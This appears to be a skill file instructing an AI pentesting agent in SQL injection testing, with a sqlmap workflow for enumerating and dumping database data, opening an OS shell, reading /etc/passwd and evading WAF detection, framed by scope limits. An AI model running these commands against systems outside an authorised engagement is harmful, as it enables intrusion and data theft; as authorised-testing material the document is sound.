# SQL Injection Attack Skill

## When to Classify Here
Use this skill when the user requests testing for SQL injection vulnerabilities, including:
- Testing web application forms, URL parameters, or API endpoints for SQLi
- Exploiting known SQL injection points
- Extracting data from databases via injection
- Blind SQL injection testing (boolean-based, time-based)

Keywords: sql injection, sqli, database extraction, union select, blind injection, sqlmap

## Workflow

### Phase 1: Reconnaissance (Informational)
1. **Identify injection surfaces** — Use `query_graph` to find web applications,
   HTTP services, and known endpoints on the target.
2. **Discover parameters** — Use `kali_shell` to run parameter and URL discovery:
   ```
   katana -u http://<target> -d 2 -jc -o urls.txt
   ```
3. **Check technology stack** — Identify the backend database type from service
   banners, error messages, or known stack info in the graph (MySQL, PostgreSQL,
   MSSQL, Oracle, SQLite).
4. **Map input vectors** — List all GET/POST parameters, cookies, and headers
   that accept user input.

Once injection surfaces are identified, **request transition to exploitation phase**.

### Phase 2: Exploitation
1. **Automated scan with sqlmap**:
   ```
   sqlmap -u "http://<target>/page?param=value" --batch --level=3 --risk=2 --random-agent
   ```
2. **Identify injection type** — Determine if it's error-based, union-based,
   blind boolean, blind time-based, or stacked queries.
3. **Enumerate databases**:
   ```
   sqlmap -u "<url>" -p <param> --dbs --batch
   ```
4. **Enumerate tables and columns**:
   ```
   sqlmap -u "<url>" -p <param> -D <database> --tables --batch
   sqlmap -u "<url>" -p <param> -D <database> -T <table> --columns --batch
   ```
5. **Extract proof data** — Dump a limited sample to prove the vulnerability:
   ```
   sqlmap -u "<url>" -p <param> -D <database> -T <table> -C <columns> --dump --start=1 --stop=5 --batch
   ```

### Phase 3: Post-Exploitation
1. **Check database privileges**:
   ```
   sqlmap -u "<url>" -p <param> --privileges --batch
   ```
2. **Attempt OS shell** (if DBA privileges exist):
   ```
   sqlmap -u "<url>" -p <param> --os-shell --batch
   ```
3. **Read server files** (if FILE privilege exists):
   ```
   sqlmap -u "<url>" -p <param> --file-read="/etc/passwd" --batch
   ```

## Reporting Guidelines
- Vulnerable endpoint and parameter name
- Injection type (error-based, union, blind, stacked)
- Database type and version
- Impact demonstration (databases enumerated, sample data extracted)
- Privilege level of the database user

## Important Notes
- Always use `--batch` with sqlmap to avoid interactive prompts
- Do NOT dump entire databases — extract only enough to prove the vulnerability (max 5 rows)
- Use `--random-agent` to avoid WAF detection
- If sqlmap fails, attempt manual injection before concluding "not vulnerable"
- Respect scope — only test endpoints within the Rules of Engagement